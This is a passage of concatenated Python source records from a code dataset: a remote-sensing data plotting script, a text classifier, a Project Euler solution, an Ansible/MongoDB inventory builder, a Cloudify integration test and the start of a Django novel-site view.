https://reffect.co.jp/python/python-pandas-not-duplicate-in-two-excels\ndf_merge = pd.merge(df,vi_data,on=date_time,how=\"inner\",indicator=True) # how=outerはNANが残る。\n#df_merge = pd.merge(df, vi_data, how=\"inner\",left_index=True, right_index=True) # how=outerはNANが残る。\n'''\nleft_index=Trueと設定すると,左側のデータフレームのインデックスを結合のキーとして用います.right_index=Trueと設定すると,右側のデータフレームのインデックスを結合のキーとして用います.\n'''\ndf_clip = df_merge.dropna(how='any') #NaN(欠損値)が一つでもある行は削除する。(https://note.nkmk.me/python-pandas-nan-dropna-fillna/)\ndf_clip[date_time] = pd.Series(df_clip[date_time].dt.strftime('%Y%m%d'), dtype='int') # 日時のフォーマットを変更\n#df_clip[date_time] = pd.Series(df_clip[date_time].dt.strftime('%Y%m%d'), dtype='str') # 日時のフォーマットを変更\n#df_clip = df_clip.set_index([date_time]) # index keyの設定\nprint(df_clip)\n\n# 処理されたデータを用いて散布図を作成し、図として保存する.\n#corrcoef, pvalue = scatter(df_clip,name_NDWI,name_NDVI,plotFile)\ncorrcoef, pvalue = scatter(df_clip,name_NDVI,prec5,plotFile)\nprint(\"Peoc_NDVI... Corr=\",corrcoef,\"(p-value=\",pvalue,\")\")\n# 処理されたデータを用いて時系列図を作成します.\n# ファイル名:precviFile # \ntimeseries(df_clip,date_time,name_NDVI,prec5,precviFile)\n\n\n#'統計量を算出してcsvで保存する。\ndf_clip_desc = df_clip.describe()\n#print(df_clip.describe())\nif os.path.isfile(desc_file):\n os.remove(desc_file) # Opt.: os.system(\"rm \"+strFile)\ndf_clip_desc.to_csv(desc_file, encoding=\"Shift_JIS\", date_format='%Y%m%d')\n\n# mergeしたデータをcsvで保存する。\nif os.path.isfile(merge_file):\n os.remove(merge_file) # Opt.: os.system(\"rm \"+strFile)\ndf_clip.to_csv(merge_file, encoding=\"Shift_JIS\", date_format='%Y%m%d')\n\n\n## 相関係数をまとめて計算してcsvで保存する。\n#'pearson': ピアソンの積率相関係数(デフォルト)\n#'kendall': ケンドールの順位相関係数\n#'spearman': スピアマンの順位相関係数\n# 表の並べ替え https://qiita.com/Masahiro_T/items/2f9574c80193f58af7fe\ndf_clip_corr = df_clip.corr(method='pearson')\n#print(df_clip.corr())\nif os.path.isfile(corr_file):\n os.remove(corr_file) # Opt.: os.system(\"rm \"+strFile)\ndf_clip_corr.to_csv(corr_file, encoding=\"Shift_JIS\", date_format='%Y%m%d')\n\n\ndate1 = np.array(df_clip[date_time])\nndvi1 = np.array(df_clip[name_NDVI])\nndwi1 = np.array(df_clip[name_NDWI])\nndsi1 = np.array(df_clip[name_NDSI])\ngsi1 = np.array(df_clip[name_GSI])\nnp_prec = np.array(df_clip[prec])\nnp_prec3 = np.array(df_clip[prec3])\nnp_prec4 = np.array(df_clip[prec4])\nnp_prec5 = np.array(df_clip[prec5])\nnp_prec6 = np.array(df_clip[prec6])\nnp_prec7 = np.array(df_clip[prec7])\nnp_prec30 = np.array(df_clip[prec30])\n\n##グラフを書く\ndfs = pd.DataFrame(df_clip[prec])\nsum = dfs.size\nprint(\"リスト数\",sum)\n\n\n#降水量をグラフに示す。\nfig1,ax1 = plt.subplots(figsize=(15,3))\nplt.plot(np_prec, marker='o', label='PREC')\nplt.plot(np_prec3, marker='*', label='PREC3')\nplt.plot(np_prec4, marker='+', label='PREC4')\nplt.plot(np_prec5, marker='.', label='PREC5')\nplt.plot(np_prec6, marker='1', label='PREC6')\nplt.plot(np_prec7, marker='2', label='PREC7')\nplt.plot(np_prec30, marker='3', label='PREC30')\nplt.legend(bbox_to_anchor=(1, 1), loc='upper right', borderaxespad=0, fontsize=10)\n#plt.legend()\nax1.set_xticks(np.arange(0,sum)) #X軸の数\nax1.set_xticklabels(date1, fontsize=10, rotation = 25, ha=\"center\")\nplt.tight_layout()\nplt.grid(True)\n#plt.show()\nif os.path.isfile(precFile):\n os.remove(precFile) # Opt.: os.system(\"rm \"+strFile)\nplt.savefig(precFile)\nplt.cla()\n\n#NDVIの時系列変化をグラフに示す\nfig2,ax2 = plt.subplots(figsize=(15,3))\n#plt.plot(prep, marker='o', label='PREP')\nplt.plot(ndvi1, marker='*', label=name_NDVI)\nplt.plot(ndwi1, marker='+', label=name_NDWI)\nplt.plot(ndsi1, marker='.', label=name_NDSI)\nplt.plot(gsi1, marker='1', label=name_GSI)\nplt.legend(bbox_to_anchor=(1, 1), loc='upper right', borderaxespad=0, fontsize=10)\n#plt.legend()\nax2.set_xticks(np.arange(0,sum)) #X軸の数\nax2.set_xticklabels(date1, fontsize=10,rotation = 25, ha=\"center\")\nax2.set_ylim(-1, 1) #y軸の最小と最大を決める\nplt.tight_layout() #レイアウトを最適化 ラベルが消えるのを制御する。\nplt.grid(True)\n#plt.show()\nif os.path.isfile(indexFile):\n os.remove(indexFile) # Opt.: os.system(\"rm \"+strFile)\nplt.savefig(indexFile)\nplt.cla()\n","sub_path":"modified_sentinel_ndvi.py","file_name":"modified_sentinel_ndvi.py","file_ext":"py","file_size_in_byte":20211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"547163410","text":"__author__ = 'Karthik'\n\nimport nltk\n\ndef read_train_file():\n _train_file = {}\n\n f = open(\"E:\\Masters\\HackDFW\\Hackaton-Users_Train.tsv\", \"r\")\n\n for train in f:\n userID, label = train.split()\n _train_file[userID] = label\n\n return _train_file\n\ndef read_screen_user_file():\n _user_set = set()\n\n f = open(\"E:\\Masters\\HackDFW\\Hackaton-Users_Screens.tsv\", \"r\")\n i = 0\n for screen_user in f:\n screen, user = screen_user.split()\n _user_set.add(user)\n\n return _user_set\n\ndef features(number):\n return {'user_id':number[:-3]}\n\nif __name__ == \"__main__\":\n _output_userIds = set()\n train_file = read_train_file()\n featuresets = [(features(n), c) for (n,c) in train_file.items()]\n #print train_file\n classifier = nltk.NaiveBayesClassifier.train(featuresets)\n #print nltk.classify.accuracy(classifier, featuresets[:1000])\n #print classifier.classify(features('3750857'))\n #print classifier.show_most_informative_features(5)\n _user_set = read_screen_user_file()\n _output_userIds = _user_set - set(train_file.keys())\n f = open('problem.txt', 'wb')\n for line in _output_userIds:\n f.write(str(line)+\"\\t\"+str(classifier.classify(features(line)))+\"\\n\")\n #print line,classifier.classify(features(line))\n f.close()\n\n\n\n\n\n\n\n","sub_path":"problem2.py","file_name":"problem2.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"86044206","text":"\"\"\"\nThe sum of the squares of the first ten natural numbers is,\n1^2 + 2^2 + ... + 10^2 = 385\n\nThe square of the sum of the first ten natural numbers is,\n(1 + 2 + ... + 10)2 = 552 = 3025\n\nHence the difference between the sum of the squares of the first ten\nnatural numbers and the square of the sum is 3025 − 385 = 2640.\n\nFind the difference between the sum of the squares of the\nfirst one hundred natural numbers and the square of the sum.\n\"\"\"\n\nimport time\nstart_time = time.time()\n\ndef consecutiveIntegerSum(start, end):\n return (start + end) * (end - start + 1) / 2\n\ndef sumOfSquares(start, end):\n \"\"\"\n sum of squares is\n\n a_0 = center sum\n a_n = a_(n-1) + 4n\n\n n\n(sigma) a_(n-1) + 4n\n 0\n \"\"\"\n #number of terms\n n = end - start + 1\n #a0 term, sum of the middle two squares\n centerSum = (n/2)**2 + ((n/2)+1)**2\n term = centerSum\n total = []\n for i in range(int(n/2)):\n term += 4*i\n total.append(term)\n return int(sum(total))\n\nsquareOfSum = consecutiveIntegerSum(1,100)**2\nsumOfSquare = sumOfSquares(1,100)\n\nprint(int(squareOfSum - sumOfSquare))\n\nprint(\"\\n--- %s seconds ---\" % str(time.time() - start_time))\n","sub_path":"6 - Sum Square Difference.py","file_name":"6 - Sum Square Difference.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"21513673","text":"#!/Users/rlaney/.virtualenvs/het-ansible/bin/python\n\n'''\nThis is the main engine for working with inventory.py\nDynamically collects all devices and attributes from Opmantek's Mongo database\nUpdates/creates/deletes Netbox's devices database with the collected data\nUpdates/creates/deletes Ansible's hosts database with the collected data\nUpdates/creates/deletes Ansible's groups database with the collected data\nLogs everything to ansible_inventorylog in the current directory\n\nReturns:\nNothing\n'''\n\nfrom __future__ import absolute_import, division, print_function\n\ntry:\n import simplejson as json\nexcept ImportError:\n import json\n\nimport csv\n#import mytools\n#import os\n#import pprint\nimport re\n#import sys\nimport signal\nfrom pymongo.mongo_client import MongoClient\nfrom pymongo.collection import Collection, ReturnDocument\nfrom pymongo.database import Database\nfrom collections import OrderedDict\nfrom pprint import pprint\n#import json\nimport logging\n\nFORMAT1='%(asctime)s: %(levelname)s: %(lineno)d: %(message)s'\nFORMAT2='%(asctime)s: %(levelname)s: %(lineno)d: %(message)s \\n \\\n \\t%(process)d: %(processName)s: %(thread)d: %(threadName)s: %(funcName)s'\n\nlogging.basicConfig(filename='ansible_inventory.log',\n format=FORMAT2,\n level=logging.INFO)\n\n'''\nDefine the database connections globally\n'''\nlogging.info('Loading mongo connections')\nlocal_uri = 'mongodb://localhost/'\nlocal_con = MongoClient(local_uri)\n# Local Mongo DB and collection nodes for testing\nlocal_nmis = local_con.get_database('nmis')\nlocal_nodes = local_nmis.get_collection('nodes')\n# Local Mongo DB and new collection devices\nlocal_netbox = local_con.get_database('netbox')\nlocal_devices = local_netbox.get_collection('devices')\n# Local Mongo DB and new collection devices\nlocal_ansible = local_con.get_database('ansible')\nlocal_hosts = local_ansible.get_collection('hosts')\nlocal_groups = local_ansible.get_collection('groups')\n\n\n'''\nThis is the base class for working with all devices/hosts\nConverts the attributes from Opmantek to a readable format\n'''\nclass BaseHost:\n def __init__(self, name, host, customer=None, group=None, location=None,\n sysLocation=None, _id=None, sysName=None, netType=None,\n roleType=None, sysObjectName=None, nodeType=None,\n deviceType=None, nodeVendor=None, nodeModel=None,\n serialNum=None, uuid=None, active=None, sysDescr=None,\n os_info=None, **kwargs):\n\n if not name or not host:\n #print('You must have a name and host')\n logging.warning('You must have a name and host')\n else:\n self.name = name\n self.primary_ip4 = host\n\n if customer is None:\n logging.debug('The field tenant_group is UNKNOWN!')\n self.tenant_group = 'Unknown'\n else:\n self.tenant_group = customer\n\n # Classify device by BU\n if group is None:\n logging.debug('The fields tenant and bu is UNKNOWN!')\n self.tenant = 'Unknown'\n self.bu = 'Unknown'\n else:\n self.tenant = group\n self.bu = group.split()[0].lower()\n\n # Classify device by site\n if location is None:\n if sysLocation is None:\n logging.debug('The fields sys_location and site is UNKNOWN!')\n self.sys_location = 'Unknown'\n self.site = 'Unknown'\n else:\n self.sys_location = sysLocation\n self.site = sysLocation.lower().replace(' ', '-')\n else:\n self.sys_location = sysLocation\n self.site = location.lower().replace(' ', '-')\n\n if _id is None:\n logging.debug('The field device_id is UNKNOWN!')\n self.device_id = 'Unknown'\n else:\n self.device_id = _id\n\n if sysName is None:\n logging.debug('The field sys_name is UNKNOWN!')\n self.sys_name = 'Unknown'\n else:\n self.sys_name = sysName\n\n # Classify device by network type\n if netType is None:\n logging.debug('The field net_type is UNKNOWN!')\n self.net_type = 'Unknown'\n else:\n self.net_type = netType.lower()\n\n # Classify device by network role\n if roleType is None:\n logging.debug('The field role_type is UNKNOWN!')\n self.role_type = 'Unknown'\n else:\n self.role_type = roleType.lower()\n\n\n if sysObjectName is None:\n logging.debug('The field device_type is UNKNOWN!')\n self.device_type = 'Unknown'\n else:\n self.device_type = sysObjectName\n\n if nodeType is None:\n logging.debug('The field node_type is UNKNOWN!')\n self.node_type = 'Unknown'\n else:\n self.node_type = nodeType\n\n # Classify device by role\n if deviceType is None:\n logging.debug('The field device_role is UNKNOWN!')\n self.device_role = 'Unknown'\n else:\n self.device_role = deviceType.lower().replace(' ', '_')\n\n if nodeVendor is None:\n logging.debug('The field vendor is UNKNOWN!')\n self.vendor = 'Unknown'\n else:\n self.vendor = nodeVendor\n\n # Classify device by type\n if nodeModel is None:\n logging.debug('The field model is UNKNOWN!')\n self.model = 'Unknown'\n else:\n self.model = nodeModel.lower()\n\n if serialNum is None:\n logging.debug('The field serial is UNKNOWN!')\n self.serial = 'Unknown'\n else:\n self.serial = serialNum\n\n if uuid is None:\n logging.debug('The field uuid is UNKNOWN!')\n self.asset_tag = 'Unknown'\n else:\n self.asset_tag = uuid\n\n if active == 'true':\n self.status = 'Production'\n else:\n logging.debug('The field status is NON-PRODUCTION?')\n self.status = 'Non-Production'\n\n if sysDescr is None:\n logging.debug('The field custom_field_values is UNKNOWN!')\n self.custom_field_values = 'Unknown'\n else:\n self.custom_field_values = sysDescr\n\n # Classify device by platform\n try:\n if os_info is None:\n logging.info('The device {} has no os_info!'.format(self.name))\n self.os_info = {}\n self.platform = 'Unknown'\n self.series = 'Unknown'\n self.version = 'Unknown'\n else:\n for k in os_info.iterkeys():\n if k is 'os':\n self.platform = os_info.os\n elif k is 'platform':\n self.series = os_info.platform.lower()\n elif k is 'version':\n self.version = os_info.version\n else:\n continue\n except AttributeError:\n logging.info('The device {} has no os_info!'.format(self.name))\n self.os_info = {}\n self.platform = 'Unknown'\n self.series = 'Unknown'\n self.version = 'Unknown'\n\n\n def to_netbox(self):\n '''\n Performs CRUD operations on Netbox devices collection\n '''\n device = {\n 'name' : str(self.name),\n 'primary_ip4' : str(self.primary_ip4),\n 'tenant_group' : str(self.tenant_group),\n 'tenant' : str(self.tenant),\n 'site' : str(self.site),\n 'net_type' : str(self.net_type),\n 'role_type' : str(self.role_type),\n 'device_type' : str(self.device_type),\n 'node_type' : str(self.node_type),\n 'device_role' : str(self.device_role),\n 'vendor' : str(self.vendor),\n 'model' : str(self.model)\n }\n\n try:\n local_devices.insert_one(device)\n #print('Successfully inserted {}'.format(device['name']))\n logging.info('Successfully inserted {}'.format(device['name']))\n except Exception as e:\n #print('Unable to insert the device {} {}'.format(device['name'], e))\n #print('Trying to update the device {}'.format(device['name']))\n logging.info('Unable to insert the device {} {}'.format(device['name'], e))\n logging.info('Trying to update the device {}'.format(device['name']))\n try:\n dev_filter = {'name': self.name}\n for k, v in device:\n dev_update = dict({'$addToSet': {k : v}})\n local_devices.update(dev_filter, dev_update, upsert=True)\n #print('Successfully updated {}'.format(device['name']))\n logging.info('Successfully updated {}'.format(device['name']))\n except Exception as e:\n #print('Unable to update the device {} {}'.format(host, e))\n logging.info('Unable to update the device {} {}'.format(host, e))\n\n\n def to_ansible(self):\n '''\n Performs CRUD operations on Ansible hosts collection\n '''\n device = {\n 'name' : str(self.name),\n 'primary_ip4' : str(self.primary_ip4),\n 'bu' : str(self.bu),\n 'site' : str(self.site),\n 'net_type' : str(self.net_type),\n 'role_type' : str(self.role_type),\n 'platform' : str(self.platform),\n 'series' : str(self.series),\n 'model' : str(self.model)\n }\n\n try:\n local_hosts.insert_one(device)\n #print('Successfully inserted {}'.format(device['name']))\n logging.info('Successfully inserted {}'.format(device['name']))\n except Exception as e:\n #print('Unable to insert the device {} {}'.format(device['name'], e))\n #print('Trying to update the device {}'.format(device['name']))\n logging.info('Unable to insert the device {} {}'.format(device['name'], e))\n logging.info('Trying to update the device {}'.format(device['name']))\n try:\n dev_filter = {'name': self.name}\n for k, v in device:\n dev_update = dict({'$addToSet': {k : v}})\n local_hosts.update(dev_filter, dev_update, upsert=True)\n #print('Successfully updated {}'.format(device['name']))\n logging.info('Successfully updated {}'.format(device['name']))\n except Exception as e:\n #print('Unable to update the device {} {}'.format(host, e))\n logging.info('Unable to update the device {} {}'.format(host, e))\n\n\ndef get_ansible_group_by_items():\n '''\n Get all the items we can group hosts by\n '''\n group_by_items = set()\n for g in local_hosts.find({}, { \"_id\": 0, \"name\": 0, \"primary_ip4\": 0 }):\n for k in g.iterkeys():\n group_by_items.add(k)\n return list(group_by_items)\n\n\ndef get_ansible_group_names(item):\n '''\n Get the group names for each item\n '''\n group_names = set()\n for i in local_hosts.find({}, { \"_id\": 0, str(item): 1 }):\n for v in i.itervalues():\n group_names.add(v)\n return list(group_names)\n\n\ndef get_devices_by_group(item, group):\n '''\n Get all the devices by group\n '''\n devices = dict()\n for d in local_hosts.find({ item: group }, { \"_id\": 0, \"name\": 1, \"primary_ip4\": 1 }):\n for k, v in d.iteritems():\n if k == \"name\":\n name = v\n elif k == \"primary_ip4\":\n ip = v\n else:\n continue\n devices.update({name : ip})\n return devices\n\n\ndef create_ansible_groups():\n '''\n Performs CRUD operations on Ansible groups collection\n '''\n items = list()\n groups = list()\n devices = dict()\n hosts = set()\n ips = set()\n host_vars = dict()\n for item in get_ansible_group_by_items():\n items.append(item)\n groups.append(get_ansible_group_names(item))\n for group in get_ansible_group_names(item):\n devices = get_devices_by_group(item, group)\n for k, v in devices.iteritems():\n hosts.add(k)\n ips.add(v)\n host_vars.update({ k: { 'ansible_hostname': v }})\n results = { str(group) : {\n 'hosts': list(hosts),\n 'vars': {},\n 'children': []\n },\n '_meta': {\n 'hostvars': host_vars\n }\n }\n\n try:\n local_groups.insert_one(results)\n #print('Successfully inserted:\\n{}'.format(results))\n logging.info('Successfully inserted:\\n{}'.format(results))\n except Exception as e:\n #print('Unable to insert the group {} {}'.format(results, e))\n #print('Trying to update the group {}'.format(results))\n logging.info('Unable to insert the group {} {}'.format(results, e))\n logging.info('Trying to update the group {}'.format(results))\n try:\n g_update = dict({'$push': {results['hosts'], results['hostvars']}})\n local_groups.update(results, g_update, upsert=True)\n #print('Successfully updated:\\n{}'.format(results))\n logging.info('Successfully updated:\\n{}'.format(results))\n except Exception as e:\n #print('Unable to update the group {} {}'.format(results, e))\n logging.info('Unable to update the group {} {}'.format(results, e))\n\n\ndef add_indexes():\n '''\n Creates the proper database indexes to improve lookup time\n '''\n try:\n local_devices.create_index([( 'name', pymongo.ASCENDING)], unique=True)\n logging.info('Created the \"NAME\" index on Netbox devices collection')\n except Exception as e:\n #print('Netbox MongoDB devices collection already has the \"NAME\" index')\n logging.info('Netbox MongoDB devices collection already has the \"NAME\" index')\n\n try:\n local_hosts.create_index([( 'name', pymongo.ASCENDING)], unique=True)\n logging.info('Created the \"NAME\" index on Ansible hosts collection')\n except Exception as e:\n #print('Ansible MongoDB hosts collection already has the \"NAME\" index')\n logging.info('Ansible MongoDB hosts collection already has the \"NAME\" index')\n\n try:\n local_groups.create_index([( 'hosts', pymongo.ASCENDING)], unique=True)\n logging.info('Created the \"HOSTS\" index on Ansible groups collection')\n except Exception as e:\n #print('Ansible MongoDB hosts collection already has the \"HOSTS\" index')\n logging.info('Ansible MongoDB hosts collection already has the \"HOSTS\" index')\n\n try:\n local_groups.create_index([( 'groups', pymongo.ASCENDING)], unique=True)\n logging.info('Created the \"GROUPS\" index on Ansible groups collection')\n except Exception as e:\n #print('Ansible MongoDB hosts collection already has the \"GROUPS\" index')\n logging.info('Ansible MongoDB hosts collection already has the \"GROUPS\" index')\n\n\nif __name__ == \"__main__\":\n for device in local_nodes.find():\n device = BaseHost(**device)\n device.to_netbox()\n device.to_ansible()\n\n create_ansible_groups()\n add_indexes()\n\n","sub_path":"scripts/dynamic_inventory.py","file_name":"dynamic_inventory.py","file_ext":"py","file_size_in_byte":15673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"132770715","text":"from scipy.ndimage.interpolation import shift\n\ndef dirderivative(img,dirvec):\n '''Take a quick directional derivative with direction dirvec.\n This is a lazy way of doing it, wraps around the edge.\n '''\n dx = img - shift(img,[0,1])\n dy = img - shift(img,[1,0])\n return dx*dirvec[0] + dy*dirvec[1];\n\n","sub_path":"dtyu/SimulationCode/pyCXD/tools/derivative.py","file_name":"derivative.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"163075933","text":"########\n# Copyright (c) 2014 GigaSpaces Technologies Ltd. All rights reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# * See the License for the specific language governing permissions and\n# * limitations under the License.\n\nimport os\n\nfrom cloudify.workflows import local\nfrom cloudify_cli import constants as cli_constants\n\nfrom cosmo_tester.framework.util import (create_rest_client, YamlPatcher,\n get_yaml_as_dict)\nfrom cosmo_tester.test_suites.test_blueprints.nodecellar_test\\\n import NodecellarAppTest\nfrom cosmo_tester.framework.git_helper import clone\n\nMANAGER_BLUEPRINTS_REPO_URL = 'https://github.com/cloudify-cosmo/' \\\n 'cloudify-manager-blueprints.git'\n\n\nclass NodecellarSingleHostTest(NodecellarAppTest):\n\n def setUp(self):\n super(NodecellarSingleHostTest, self).setUp()\n blueprint_path = self.copy_blueprint('openstack-start-vm')\n self.blueprint_yaml = blueprint_path / 'blueprint.yaml'\n self.prefix = 'simple-host-{0}'.format(self.test_id)\n self.manager_blueprint_overrides = {}\n\n self.inputs = {\n 'prefix': self.prefix,\n 'external_network': self.env.external_network_name,\n 'os_username': self.env.keystone_username,\n 'os_password': self.env.keystone_password,\n 'os_tenant_name': self.env.keystone_tenant_name,\n 'os_region': self.env.region,\n 'os_auth_url': self.env.keystone_url,\n 'image_id': self.env.ubuntu_trusty_image_id,\n 'flavor': self.env.medium_flavor_id,\n 'key_pair_path': '{0}/{1}-keypair.pem'.format(self.workdir,\n self.prefix)\n }\n\n self.logger.info('initialize local env for running the '\n 'blueprint that starts a vm')\n self.local_env = local.init_env(\n self.blueprint_yaml,\n inputs=self.inputs,\n name=self._testMethodName,\n ignored_modules=cli_constants.IGNORED_LOCAL_WORKFLOW_MODULES)\n\n self.logger.info('starting vm to serve as the management vm')\n self.local_env.execute('install',\n task_retries=10,\n task_retry_interval=30)\n self.public_ip_address = \\\n self.local_env.outputs()['simple_vm_public_ip_address']\n self.private_ip_address = \\\n self.local_env.outputs()['simple_vm_private_ip_address']\n\n self.addCleanup(self.cleanup)\n\n def test_nodecellar_single_host(self):\n self.bootstrap_simple_manager_blueprint()\n self._test_nodecellar_impl('singlehost-blueprint.yaml')\n\n def _update_manager_blueprint(self):\n self._update_manager_blueprints_overrides()\n\n with YamlPatcher(self.test_manager_blueprint_path) as patch:\n for prop_path, new_value in \\\n self.manager_blueprint_overrides.items():\n patch.set_value(prop_path, new_value)\n\n def _update_manager_blueprints_overrides(self):\n manager_blueprint_dict = \\\n get_yaml_as_dict(self.env._manager_blueprint_path)\n\n agents_prop_in_dict = manager_blueprint_dict['node_templates'][\n 'manager']['properties']['cloudify_packages']['agents']\n agents_prop_string = \\\n 'node_templates.manager.properties.cloudify_packages.agents'\n\n docker_prop_in_dict = manager_blueprint_dict['node_templates'][\n 'manager']['properties']['cloudify_packages']['docker']\n docker_prop_string = \\\n 'node_templates.manager.properties.cloudify_packages.docker'\n\n self.manager_blueprint_overrides['{0}.ubuntu_agent_url'.format(\n agents_prop_string)] = agents_prop_in_dict['ubuntu_agent_url']\n self.manager_blueprint_overrides['{0}.centos_agent_url'.format(\n agents_prop_string)] = agents_prop_in_dict['centos_agent_url']\n self.manager_blueprint_overrides['{0}.windows_agent_url'.format(\n agents_prop_string)] = agents_prop_in_dict['windows_agent_url']\n self.manager_blueprint_overrides['{0}.docker_url'.format(\n docker_prop_string)] = docker_prop_in_dict['docker_url']\n\n def _bootstrap(self):\n self.cfy.bootstrap(blueprint_path=self.test_manager_blueprint_path,\n inputs_file=self.test_inputs_path,\n task_retries=5)\n self.addCleanup(self.cfy.teardown)\n\n def bootstrap_simple_manager_blueprint(self):\n self.manager_blueprints_repo_dir = clone(MANAGER_BLUEPRINTS_REPO_URL,\n self.workdir)\n self.test_manager_blueprint_path = \\\n os.path.join(self.manager_blueprints_repo_dir,\n 'simple', 'simple-manager-blueprint.yaml')\n\n # using the updated handler configuration blueprint to update the\n # package urls in the simple manager blueprint\n self._update_manager_blueprint()\n\n self.bootstrap_inputs = {\n 'public_ip': self.public_ip_address,\n 'private_ip': self.private_ip_address,\n 'ssh_user': 'ubuntu',\n 'ssh_key_filename': self.inputs['key_pair_path'],\n\n 'agents_user': 'ubuntu',\n 'resources_prefix': ''\n }\n\n # preparing inputs file for bootstrap\n self.test_inputs_path = \\\n self.cfy._get_inputs_in_temp_file(self.bootstrap_inputs,\n self._testMethodName)\n self._bootstrap()\n self._running_env_setup(self.public_ip_address)\n\n def get_inputs(self):\n return {\n 'host_ip': self.private_ip_address,\n 'agent_user': 'ubuntu',\n # default agent key location\n 'agent_private_key_path': '~/.ssh/agent_key.pem'\n }\n\n def _running_env_setup(self, management_ip):\n self.env.management_ip = management_ip\n self.client = create_rest_client(management_ip)\n response = self.client.manager.get_status()\n if not response['status'] == 'running':\n raise RuntimeError('Manager at {0} is not running.'\n .format(management_ip))\n\n def cleanup(self):\n self.local_env.execute('uninstall',\n task_retries=40,\n task_retry_interval=30)\n\n def get_public_ip(self, nodes_state):\n return self.public_ip_address\n\n @property\n def expected_nodes_count(self):\n return 4\n\n @property\n def host_expected_runtime_properties(self):\n return []\n","sub_path":"cosmo_tester/test_suites/test_simple_manager_blueprint/nodecellar_singlehost_test.py","file_name":"nodecellar_singlehost_test.py","file_ext":"py","file_size_in_byte":7078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"343661004","text":"import datetime\nimport json\nimport re\n\nfrom django.shortcuts import render, get_object_or_404\nfrom django.conf import settings\nfrom django.db.models import Count\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.http import JsonResponse\nfrom django.contrib.auth.models import User\nfrom django.utils import timezone\nfrom django.db.models import Sum\nfrom django.core.cache import cache\nfrom django.core import serializers\n\nfrom .models import Novel, NovelType, NovelChapter\nfrom user.models import Profile\nfrom history.models import History\nfrom rate.models import Rate\nfrom pure_pagination import Paginator, PageNotAnInteger\nfrom read_count.utils import visit, get_seven_days_read_num, get_today_hot_data\nfrom mysite.utils import get_random_str\n\n\n# 获取指定天数阅读量排行\ndef get_days_hot_novels(days):\n today = timezone.now().date()\n date = today - datetime.timedelta(days=days)\n novels = Novel.objects.filter(read_detail__date__lte=today, read_detail__date__gte=date).values('id',\n 'title',\n ).annotate(\n Sum('read_detail__read_num')).order_by('-read_detail__read_num__sum')\n return novels\n\n\n# 设置缓存\ndef use_cache(document, days):\n do = cache.get(document)\n if do is None:\n do = get_days_hot_novels(days)\n cache.set(document, do, 3600)\n\n\n# 封装共同数据方法\ndef get_novel_common_data(request, novels, each_page_num=settings.EACH_PAGE_NUM):\n try:\n page = request.GET.get('page', 1)\n except PageNotAnInteger:\n page = 1\n p = Paginator(novels, each_page_num, request=request)\n novels_page = p.page(page)\n\n # 各月份小说总数\n novel_dates = Novel.objects.dates('create_time', 'month', 'DESC')\n novel_dates_list = {}\n for novel_date in novel_dates:\n novel_count = Novel.objects.filter(create_time__year=novel_date.year,\n create_time__month=novel_date.month).count()\n novel_dates_list[novel_date] = novel_count\n\n novel_content_type = ContentType.objects.get_for_model(Novel) # novel 的 ContentType\n\n # 使用缓存\n use_cache('week_hot_novels', timezone.now().weekday())\n use_cache('month_hot_novels', timezone.now().month)\n\n context = {\n 'read_nums': get_seven_days_read_num(novel_content_type), # 近七天的每天阅读量\n 'today_hot_datas': get_today_hot_data(novel_content_type), # 日排行\n 'week_hot_novels': get_days_hot_novels(timezone.now().weekday()), # 周排行\n 'month_hot_novels': get_days_hot_novels(timezone.now().month), # 月排行\n 'novels_dates': novel_dates_list,\n 'novels_page': novels_page,\n 'novel_types': NovelType.objects.annotate(count=Count('novel'))\n }\n return context\n\n\ndef novel_list(request):\n novels = Novel.objects.all()\n context = get_novel_common_data(request, novels)\n return render(request, 'novel_list.html', context)\n\n\ndef novels_chapter(request, novels_title_pk, novels_chapter_num):\n novel_title = get_object_or_404(Novel, pk=novels_title_pk)\n novel_type = get_object_or_404(NovelType, type_name=novel_title.novel_type)\n novel_content_type = ContentType.objects.get_for_model(Novel)\n if request.user.is_authenticated:\n History.objects.update_or_create(content_type=novel_content_type, object_id=novels_title_pk, user=request.user)\n if not Rate.objects.filter(content_type=novel_content_type, object_id=novels_title_pk,\n user=request.user).exists():\n Rate.objects.create(content_type=novel_content_type, object_id=novels_title_pk, user=request.user, rating=1)\n cookies_key = visit(request, novel_title)\n if NovelChapter.objects.filter(novel_title=novel_title, chapter_num=novels_chapter_num).exists():\n novels_chapter = NovelChapter.objects.get(novel_title=novel_title, chapter_num=novels_chapter_num) # 小说一个章节\n novels_chapters = novel_title.novel.all() # 小说所有章节\n previous_chapter = NovelChapter.objects.filter(novel_title=novel_title,\n chapter_num__lt=novels_chapter_num).last()\n next_chapter = NovelChapter.objects.filter(novel_title=novel_title, chapter_num__gt=novels_chapter_num).first()\n last_novel = NovelChapter.objects.filter(novel_title=novel_title).last()\n chapters = []\n last_chapters = {}\n novel_words = 0\n for i in novels_chapters:\n novel_words += len(i.chapter_content)\n if last_novel.chapter_num > 10:\n times = int(str(last_novel.chapter_num)[:1])\n for i in range(times):\n chapters.append({\n 'chapter_title': novels_chapters[i * 10:i * 10 + 10],\n 'start_chapter': i * 10 + 1,\n 'end_chapter': i * 10 + 10,\n })\n last_chapters['last_chapters_title'] = novels_chapters[times * 10:last_novel.chapter_num + 1]\n last_chapters['last_chapter_start'] = times * 10 + 1\n last_chapters['last_chapter_end'] = last_novel.chapter_num\n else:\n last_chapters['last_chapters_title'] = novels_chapters[:last_novel.chapter_num + 1]\n last_chapters['last_chapter_start'] = 1\n last_chapters['last_chapter_end'] = last_novel.chapter_num\n response = 